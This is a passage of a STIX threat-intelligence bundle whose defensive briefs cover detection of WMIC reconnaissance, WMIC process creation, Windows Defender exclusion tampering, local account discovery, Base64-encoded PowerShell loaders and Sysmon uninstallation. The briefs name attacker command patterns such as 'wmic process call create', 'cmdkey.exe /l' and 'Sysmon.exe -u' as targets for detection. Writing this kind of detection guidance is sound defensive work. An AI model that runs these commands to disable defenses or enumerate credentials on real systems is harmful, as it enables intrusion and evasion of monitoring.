significant data breaches.\n\n## Recommendation\n\n*   Enable Sysmon process-creation logging to capture `wmic.exe` executions and their command-line arguments, which is essential for activating the rules below.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, paying close attention to `wmic.exe` executions that include `csproduct` in their command line.\n*   Implement strong application whitelisting policies to prevent the execution of unauthorized infostealer payloads, which precede the use of `wmic.exe` for reconnaissance.\n",
      "published": "2026-07-03T14:47:04Z",
      "labels": [
        "reconnaissance",
        "windows",
        "infostealer"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
        "threat-actor--8f34755b-a41f-5d6e-8363-2cb379118d65"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml"
        },
        {
          "source_name": "reference",
          "url": "https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/"
        },
        {
          "source_name": "reference",
          "url": "https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Information Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1082",
          "url": "https://attack.mitre.org/techniques/T1082"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54c23d2d-20c6-5c5c-af12-96e1d6bf7562",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2d7e79b-a2a7-5bb9-9c9b-08774ed18bc9",
      "target_ref": "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--9a73568b-032e-5637-ac11-a5f6f924085c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "DEV-0270 / Phosphorus"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b2de2698-e9ee-51a6-92fc-101c9ce3dff4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--b2d7e79b-a2a7-5bb9-9c9b-08774ed18bc9",
      "target_ref": "threat-actor--9a73568b-032e-5637-ac11-a5f6f924085c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b2d7e79b-a2a7-5bb9-9c9b-08774ed18bc9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Computer System Reconnaissance Via Wmic.EXE",
      "description": "## Overview\n\nAdversaries, notably groups like DEV-0270 (also known as Phosphorus), leverage the native Windows Management Instrumentation Command-line (WMIC) utility for system reconnaissance. This technique involves executing `wmic.exe` with the `computersystem` flag to query for detailed machine information. This activity, observed since at least late 2022, serves as a crucial precursor to subsequent attack stages in ransomware operations. By gathering data such as domain membership, current username, system model, and operating system details, attackers can tailor their approach for privilege escalation, lateral movement, or targeted data exfiltration. The use of a legitimate system binary makes this activity harder to detect without specific command-line logging and careful analysis.\n\n## Attack Chain\n\n1.  **Reconnaissance Command Execution**: An attacker executes `wmic.exe` with the `computersystem` class to enumerate system properties.\n2.  **Information Gathering**: The command `wmic computersystem get` or similar is run to extract details such as the computer's domain, username, manufacturer, model, and OS version.\n3.  **Data Collection**: The collected system information is often stored temporarily on the compromised host or directly transmitted to the attacker's command and control (C2) infrastructure.\n4.  **Decision Making**: Based on the gathered information, the adversary makes decisions regarding the next steps in their campaign, such as identifying targets for lateral movement or specific privilege escalation techniques.\n5.  **Preparation for Exploitation**: The reconnaissance data informs the deployment of additional tools or the exploitation of specific vulnerabilities relevant to the discovered system configuration.\n6.  **Further Attack Phases**: The adversary proceeds with privilege escalation, lateral movement, data exfiltration, or the deployment of payloads like ransomware, as observed in DEV-0270 operations.\n\n## Impact\n\nThe direct impact of `wmic.exe` reconnaissance is information disclosure, which itself is low-risk. However, as demonstrated by ransomware operators like DEV-0270 (Phosphorus), this type of reconnaissance is a foundational step enabling more severe impacts. Successful information gathering allows attackers to tailor highly effective follow-on attacks, such as deploying ransomware, exfiltrating sensitive data, or causing significant operational disruption. Without detecting and mitigating these initial reconnaissance activities, organizations face a heightened risk of full system compromise, data breaches, and financial losses due to ransomware demands and recovery efforts.\n\n## Recommendation\n\n*   Deploy the \"Computer System Reconnaissance Via Wmic.EXE\" Sigma rule to your SIEM to detect suspicious `wmic.exe` usage.\n*   Ensure Sysmon (Event ID 1) or equivalent process creation logging is enabled for all Windows endpoints to capture command-line arguments for `wmic.exe`.\n*   Tune the \"Computer System Reconnaissance Via Wmic.EXE\" rule to establish a baseline of legitimate `wmic` usage in your environment and minimize false positives.\n*   Monitor for other forms of system information discovery, as attackers often combine various reconnaissance techniques.\n",
      "published": "2026-07-03T14:45:54Z",
      "labels": [
        "discovery",
        "reconnaissance",
        "windows",
        "ransomware"
      ],
      "object_refs": [
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "threat-actor--9a73568b-032e-5637-ac11-a5f6f924085c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be795fe9-d863-5b63-b58c-1b8a2a132bd1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d6dc30ec-8eac-5cb7-ab69-47fe009dde78",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d6dc30ec-8eac-5cb7-ab69-47fe009dde78",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Creation Attempt via Wmic.EXE",
      "description": "## Overview\n\nThis threat brief focuses on the technique where adversaries leverage the legitimate Windows Management Instrumentation Command-line (WMIC) utility, specifically `wmic.exe`, to create new processes on a compromised host. This method allows attackers to execute arbitrary commands or malicious binaries, often as a post-exploitation step to establish persistence, move laterally, or deliver payloads. The technique involves invoking `wmic.exe` with the `process call create` arguments, targeting the system's process management capabilities. Detection is focused on identifying these specific command-line patterns. This behavior, while potentially legitimate in rare administrative contexts, is frequently abused by threat actors to execute their tools and further their objectives. The activity is generally observed following initial access, enabling execution of next-stage implants.\n\n## Impact\n\nSuccessful exploitation of this technique by adversaries can lead to the execution of unauthorized processes, potentially resulting in further compromise of the system. This could involve the deployment of malware (e.g., ransomware, infostealers), establishment of backdoors for persistent access, or execution of commands for data exfiltration or lateral movement. While the technique itself doesn't directly cause data loss, it is a critical step that enables attackers to achieve their final objectives, ranging from financial fraud to intellectual property theft or system disruption.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Detects Process Creation Attempt via Wmic.EXE\" to your SIEM and tune it for your environment.\n*   Ensure `process_creation` logging is enabled on all Windows endpoints to capture the necessary telemetry for the rule.\n*   Review any alerts generated by the Sigma rule for `wmic.exe` with `process call create` to identify and investigate suspicious process execution attempts.\n",
      "published": "2026-07-03T14:45:14Z",
      "labels": [
        "execution",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sans.org/blog/wmic-for-incident-response/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d77d524a-65de-54f8-8bd2-3d37b374d74e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e035f266-ce72-5b36-bdc3-17543505ef1f",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Management Instrumentation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1047",
          "url": "https://attack.mitre.org/techniques/T1047"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d5d9ebb-1fa9-534e-a479-a676a959642a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e035f266-ce72-5b36-bdc3-17543505ef1f",
      "target_ref": "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e035f266-ce72-5b36-bdc3-17543505ef1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Windows Defender Tampering via WMIC for Defense Evasion",
      "description": "## Overview\n\nThis brief details a common defense evasion technique where adversaries leverage `wmic.exe` (Windows Management Instrumentation Command-line) to modify Windows Defender settings. The `wmic.exe` utility, a legitimate system tool, is abused to interact with the `\\\\root\\\\Microsoft\\\\Windows\\\\Defender` WMI namespace, allowing attackers to programmatically add exclusions for files, paths, processes, or file extensions. This tampering effectively bypasses Windows Defender's real-time protection, creating blind spots for malicious payloads to execute and persist undetected. This method has been observed in campaigns by various malware families, including Gootkit, to ensure their operations are not impeded by antivirus software. Detecting such activity is critical as it indicates a significant compromise and an attempt to neutralize a primary endpoint security control.\n\n## Attack Chain\n\n1.  **Initial Access:** An adversary successfully gains execution on a target Windows host, typically through spearphishing or exploiting a vulnerable service.\n2.  **Discovery:** (Optional) The attacker performs reconnaissance to identify Windows Defender as the active endpoint protection solution on the compromised system.\n3.  **Defense Evasion (WMIC Execution):** The adversary executes `wmic.exe` via the command line or a script, specifying the `\\\\root\\\\Microsoft\\\\Windows\\\\Defender` WMI namespace to interact with Defender's settings.\n4.  **Defense Evasion (Exclusion Creation):** Using `wmic.exe`, the attacker issues commands to add specific file paths, process names, or file extensions to Windows Defender's exclusion list, preventing it from scanning or quarantining malicious artifacts.\n5.  **Execution/Persistence Facilitation:** With the exclusions in place, the adversary proceeds to execute their primary payload (e.g., malware, ransomware, credential dumpers) or establish persistence mechanisms in the excluded areas, ensuring they operate without detection.\n6.  **Impact:** The attacker achieves their objective, such as data exfiltration, ransomware deployment, or system takeover, leveraging the bypassed endpoint defenses.\n\n## Impact\n\nSuccessful tampering with Windows Defender via `wmic.exe` significantly degrades the security posture of the compromised system, leaving it vulnerable to subsequent malicious activity. Adversaries can achieve undetected execution of malware, install ransomware, exfiltrate sensitive data, or establish long-term persistence without the primary endpoint detection and response (EDR) solution interfering. While specific victim counts are not tied to this general technique, successful implementation allows attackers to bypass critical defenses, leading to severe operational disruption, financial loss, and data breaches across various sectors.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule (`Potential Windows Defender Tampering Via Wmic.EXE`) to your SIEM/EDR to detect suspicious `wmic.exe` interactions with Windows Defender.\n*   Enable comprehensive process creation logging (e.g., Sysmon Event ID 1) to capture full `CommandLine` arguments for `wmic.exe` executions.\n*   Review legitimate administrative scripts and security tools that may use `wmic.exe` to interact with Defender settings to establish a baseline and reduce false positives.\n*   Implement host-based firewall rules or network segmentation to limit outbound connections, even if Defender is tampered with, to contain post-exploitation activity.\n",
      "published": "2026-07-03T14:44:28Z",
      "labels": [
        "defense-evasion",
        "wmic",
        "windows-defender",
        "endpoint-security",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--a9b90aa1-84ae-5946-856c-c4806f4065ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md"
        },
        {
          "source_name": "reference",
          "url": "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/"
        },
        {
          "source_name": "reference",
          "url": "https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4086de84-39a5-5e27-92a1-f3847ac6751e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Owner/User Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1033",
          "url": "https://attack.mitre.org/techniques/T1033"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5cdd4f50-24e3-5f73-bd07-9933cc478195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a978c4b-ed92-5215-9a87-53fbb3f26e7b",
      "target_ref": "attack-pattern--4086de84-39a5-5e27-92a1-f3847ac6751e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1087",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f1a4867-e89d-5792-b878-63ba5e9abcf8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0a978c4b-ed92-5215-9a87-53fbb3f26e7b",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0a978c4b-ed92-5215-9a87-53fbb3f26e7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Local Account and System Owner Discovery via Native Utilities",
      "description": "## Overview\n\nThis brief details a common post-exploitation reconnaissance technique used by threat actors to discover local user accounts and system owner information on compromised Windows systems. Adversaries employ built-in operating system utilities such as `whoami.exe`, `quser.exe`, `qwinsta.exe`, `wmic.exe`, `cmdkey.exe`, `cmd.exe`, and `net.exe` to gather intelligence about the environment. This activity, while benign in some administrative contexts, is a crucial step in an attacker's kill chain, enabling them to identify potential targets for privilege escalation, lateral movement, or to understand the scope of their access. This technique is often observed after initial access has been gained and before further actions on objectives are pursued.\n\n## Attack Chain\n\n1.  **Initial Access**: A threat actor gains initial access to a Windows system, often via a phishing email with a malicious attachment or exploitation of a vulnerable internet-facing service.\n2.  **Execution**: Malware or a shellcode payload is executed, establishing a foothold on the compromised machine and executing a command.\n3.  **Persistence**: The attacker establishes persistence mechanisms, such as creating a new scheduled task or modifying a Run key, to maintain access across reboots.\n4.  **Local Account Discovery**: Using utilities like `whoami.exe`, `wmic.exe useraccount get`, `cmdkey.exe /l`, `cmd.exe /c dir \\Users\\`, or `net.exe user`, the attacker enumerates local user accounts, logged-on users, and cached credentials to understand the local user landscape. This step is the focus of the detection.\n5.  **Privilege Escalation**: Based on discovered information (e.g., identifying unpatched software, weak passwords, or privileged users), the attacker attempts to escalate privileges to gain administrative rights on the system.\n6.  **Lateral Movement**: With elevated privileges, the attacker moves to other systems within the network, often by exploiting discovered credentials or misconfigurations.\n7.  **Data Exfiltration / Impact**: The attacker achieves their final objective, such as exfiltrating sensitive data, deploying ransomware, or disrupting operations.\n\n## Impact\n\nFailure to detect and respond to local account discovery can allow adversaries to gain a deeper understanding of the compromised environment, leading to successful privilege escalation and lateral movement. This reconnaissance phase is critical for attackers to identify high-value targets, gather credentials, and expand their access within an organization. The ultimate impact can range from data exfiltration and intellectual property theft to ransomware deployment, significant operational disruption, and severe financial and reputational damage. While discovery itself is not destructive, it directly facilitates more damaging subsequent stages of an attack.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule in this brief to your SIEM and tune it for your environment.\n*   Enable Sysmon process creation logging to activate the rule above, ensuring `Image`, `CommandLine`, and `OriginalFileName` fields are captured.\n*   Review alerts generated by the Sigma rule for execution of `whoami.exe`, `quser.exe`, `qwinsta.exe`, `wmic.exe` with `useraccount get`, `cmdkey.exe /l`, `cmd.exe /c dir \\Users\\`, and `net.exe user` from unusual processes or user contexts.\n*   Implement Endpoint Detection and Response (EDR) solutions to monitor and alert on suspicious usage of built-in Windows utilities, particularly when invoked in unusual sequences or from unexpected parent processes.\n",
      "published": "2026-07-03T14:43:40Z",
      "labels": [
        "discovery",
        "reconnaissance",
        "post-exploitation",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--4086de84-39a5-5e27-92a1-f3847ac6751e",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drive-by Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1189",
          "url": "https://attack.mitre.org/techniques/T1189"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a531e5c-253e-5b3c-87f9-c9e229808d71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0b65b75-4610-53d7-92a8-15e610c682e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9df7cfe3-872c-5e2f-9074-d4f5f4b2a288",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79a29b89-704e-5890-8e9a-49df8f3a2800",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7bdfe7e7-cdf6-53ef-9207-a1eb1e5dc568",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--fdddc64f-eae7-5d67-bd5e-22411c522e6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gootloader"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be6137f3-d846-5261-9e2c-58d2e4ee45e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "target_ref": "threat-actor--fdddc64f-eae7-5d67-bd5e-22411c522e6d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3efb120c-c71b-5cdd-accf-475c24597551",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Base64 Encoded PowerShell Invoke- Keywords",
      "description": "## Overview\n\nThis threat brief focuses on the detection of Base64 encoded PowerShell command-line arguments that contain the `Invoke-` keyword, a prevalent obfuscation technique used by various malware families, including Gootloader. Threat actors frequently employ Base64 encoding to evade endpoint security solutions and conceal malicious PowerShell scripts used for initial execution, staging, and downloading additional payloads. This technique became widely recognized in campaigns like the Gootloader \"SEO Poisoning\" attacks, which began leveraging this method for stealthy execution of malicious JavaScript files that ultimately deploy encoded PowerShell. Detecting these patterns is critical as they often indicate an attempt to bypass traditional signature-based defenses and execute complex attack stages, leading to severe impacts like ransomware deployment or data exfiltration.\n\n## Attack Chain\n\n1.  **Initial Access (SEO Poisoning):** Users search for legitimate business documents online and are redirected to malicious websites via SEO poisoning techniques.\n2.  **Malicious Download:** Victims are prompted to download a seemingly legitimate `.zip` archive containing a highly obfuscated `.js` file or an ISO image.\n3.  **User Execution:** The victim executes the downloaded malicious `.js` file, often by double-clicking it, initiating the infection chain.\n4.  **Obfuscated PowerShell Execution:** The `.js` file (or other initial dropper) launches a PowerShell process via `mshta.exe` or `wscript.exe`, executing a highly obfuscated, Base64-encoded command.\n5.  **Encoded Script Decryption \u0026 Execution:** The Base64-encoded string, containing keywords like `Invoke-Expression` or `Invoke-Command`, is decoded and executed by PowerShell, establishing covert communication.\n6.  **Command and Control (C2):** The decoded PowerShell script connects to attacker-controlled C2 infrastructure to fetch subsequent stage payloads or commands.\n7.  **Payload Delivery:** Additional malware, such as the Gootloader loader, is downloaded and executed, which then often deploys further malicious implants like Cobalt Strike, IcedID, or various infostealers.\n8.  **Impact:** The deployed malware performs its objectives, which can range from further network compromise, data exfiltration, or ransomware deployment.\n\n## Impact\n\nAttacks leveraging Base64 encoded PowerShell `Invoke-` keywords, particularly those involving Gootloader, can have severe consequences for victim organizations. Gootloader campaigns are known for their broad targeting across various sectors, distributing a wide array of follow-on malware. Successful exploitation can lead to complete network compromise, widespread data encryption via ransomware, significant data exfiltration, and the theft of credentials or sensitive information. The resulting disruption can incur substantial financial costs related to incident response, recovery, and potential regulatory fines.\n\n## Recommendation\n\n*   Deploy the `PowerShell Base64 Encoded Invoke Keyword` Sigma rule to your SIEM to detect suspicious encoded PowerShell activity.\n*   Enable PowerShell script block logging and module logging on all Windows endpoints to gain visibility into the content of executed scripts.\n*   Regularly review logs for any processes initiating PowerShell with Base64 encoded commands, specifically looking for `Invoke-` keywords in the decoded content.\n*   Implement robust web filtering and email security solutions to block access to known malicious domains and prevent the delivery of malicious attachments associated with SEO poisoning campaigns.\n",
      "published": "2026-07-03T14:42:23Z",
      "labels": [
        "powershell",
        "obfuscation",
        "evasion",
        "gootloader",
        "windows",
        "execution",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "threat-actor--fdddc64f-eae7-5d67-bd5e-22411c522e6d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml"
        },
        {
          "source_name": "reference",
          "url": "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6902595b-ce4e-5287-bec9-ac11a496f28e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a06617df-4991-52e7-a675-ba8560515868",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a06617df-4991-52e7-a675-ba8560515868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Brief: Detection of Sysinternals Sysmon Uninstallation",
      "description": "## Overview\n\nAttackers frequently employ defense evasion tactics to hinder detection and analysis of their activities. One such tactic is the uninstallation of security tools like Sysinternals Sysmon. Sysmon, a free Sysinternals utility from Microsoft, provides detailed information about process creations, network connections, file modifications, and other system events, making it an invaluable asset for threat detection and incident response. The act of uninstalling Sysmon (`Sysmon.exe -u` or `Sysmon64.exe -u`) is a strong indicator of malicious intent, as legitimate administrators rarely remove such a critical monitoring agent without prior planning and notification. This action typically occurs after initial compromise and privilege escalation, as attackers seek to operate undetected on the compromised system. Detecting this behavior is crucial for security teams to identify defense evasion attempts and respond before further malicious actions can be concealed.\n\n## Impact\n\nThe successful uninstallation of Sysmon leads to a significant blind spot in endpoint visibility for security teams. Without Sysmon logs, an attacker can perform a wide range of post-exploitation activities—such as executing malware, establishing persistence, exfiltrating data, or moving laterally—with a substantially reduced chance of detection. This loss of telemetry can severely hamper incident response efforts, prolong dwell time, and allow 